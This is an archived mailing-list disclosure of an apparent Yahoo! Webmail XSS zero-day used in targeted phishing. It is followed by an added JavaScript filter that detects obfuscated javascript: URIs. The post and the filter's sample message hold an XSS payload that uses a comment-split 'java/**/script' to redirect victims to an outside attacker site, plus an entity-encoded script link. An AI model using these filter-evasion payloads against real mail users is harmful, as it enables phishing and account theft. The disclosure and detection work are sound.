TUCoPS :: Web :: Specific Sites :: b06-1680.htm

Yahoo! Webmail XSS

Hi.

I just got a targeted phishing attack on one of my
Yahoo email accounts; what's interesting is that
the attack exploits a Yahoo! webmail 0day XSS
vulnerability.
I'm trying to contact Yahoo right now, but in the
meantime I thought it would be good to provide some
bits because of the seriousness of this.
When you browse a message on Yahoo! Webmail the XSS
exploit creates a frameset and redirects to
http://w00tynetwork.com/x/. It's interesting that the
address bar in IE doesn't refresh to show the actual
URL; you can only see the redirection to
http://w00tynetwork.com/x/ in the IE status bar if you
have it visible.
I don't know if this vulnerability is being exploited
in the wild, since it was a targeted attack; I'm sure
about this because of the content of the message.

Here is an extract from the exploit so you can start
building some signatures, filtering, etc.
-----------------------------------
(java/**/script:document.write('src=http://w00tynetwork.com/x/>')) 
-----------------------------------

I will provide full details later when Yahoo! fixes the
issue.
If security vendors are interested in full details,
please ask for them at info>at.http://mail.yahoo.com
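The extract above shows the trick the filter missed: a "/**/" comment splitting the word "javascript" so that a naive match on "javascript:" fails, while the browser strips the comment and still treats the value as a javascript: URI. The following filter helper is an added example for building the signatures the poster asks for; it is not Yahoo!'s code and not part of the original post. The normalisation steps (HTML entity decoding, comment removal, control-character removal, case folding) are assumptions about what a lenient browser of that era tolerated, and the sample message body is constructed, reusing only the fragment quoted above.

```javascript
// Added example (not from the original post): normalise an attribute value
// the way a lenient HTML/URL parser does before deciding its scheme, so that
// obfuscations such as "java/**/script:" or "&#106;avascript:" are caught.

// Decode the numeric entities and the two named entities commonly used to
// smuggle whitespace into a scheme (assumption: a parser-like subset only).
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/&tab;/gi, "\t")
    .replace(/&newline;/gi, "\n");
}

// Canonical form of an attribute value for scheme matching.
function canonicalizeScheme(value) {
  let v = decodeHtmlEntities(String(value));
  v = v.replace(/\/\*[\s\S]*?\*\//g, ""); // drop /* ... */ comments (java/**/script)
  v = v.replace(/[\x00-\x20]/g, "");      // drop control chars, tabs, newlines, spaces
  return v.toLowerCase();
}

// True when the canonical value names a script-executing scheme.
function isJavascriptUri(value) {
  return /^(javascript|vbscript|livescript):/.test(canonicalizeScheme(value));
}

// Scan raw message HTML and return every URL-bearing attribute value
// (href/src/action/data) that resolves to a script scheme.
function findScriptUris(html) {
  const hits = [];
  const attr = /\b(?:href|src|action|data)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = attr.exec(html)) !== null) {
    const value = m[1] ?? m[2] ?? m[3] ?? "";
    if (isJavascriptUri(value)) hits.push(value);
  }
  return hits;
}

// Constructed sample message body (not the real phishing mail); the iframe
// src reuses the fragment quoted in the post, the other lines are invented.
const SAMPLE_MESSAGE = [
  "<p>Please verify your account</p>",
  "<iframe src=\"java/**/script:document.write('src=http://w00tynetwork.com/x/>')\"></iframe>",
  "<a href=\"&#106;avascript:alert(1)\">login</a>",
  "<a href=\"http://mail.yahoo.com/\">legit</a>",
].join("\n");

console.log(findScriptUris(SAMPLE_MESSAGE));
```

Matching on the canonical form rather than the raw bytes is the point: a signature written against the literal string "javascript:" would have missed the sample above, while a signature against the normalised value catches the comment split, the entity encoding and inserted tabs alike.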
